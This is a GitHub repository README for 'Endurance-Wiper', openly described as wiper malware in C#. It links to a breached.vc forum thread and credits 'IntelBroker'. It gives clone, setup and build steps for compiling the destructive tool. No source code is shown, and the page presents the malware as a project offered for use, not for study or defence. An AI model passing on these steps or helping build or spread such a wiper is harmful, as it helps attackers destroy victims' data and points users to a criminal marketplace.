Skip to content

Latest commit

 

History

History
24 lines (19 loc) · 763 Bytes

README.md

File metadata and controls

24 lines (19 loc) · 763 Bytes

Endurance-Wiper Beta - Open Source

A small wiper malware written in C# using the .NET framework. If you are from Twitter or any other source, you can clearly tell this is in active development. You are free to check the updates here.

https://breached.vc/Thread-active-development-custom-wiper-ransomware

Requirements

  • Visual Studio 22
    • Visual Studio C# for desktop development package

Setup

  1. Clone the repository: git clone https://github.com/IntelBroker/Endurance-Wiper/
  2. Open the downloaded folder.
  3. Open Endurance.sln with Visual Studio 22

Building

  1. Set the build type to "debug"
  2. Right click the solution of the project.
  3. Click "Build"
  4. Output file will be located in /bin/Debug/

Credits

IntelBroker @ breached.vc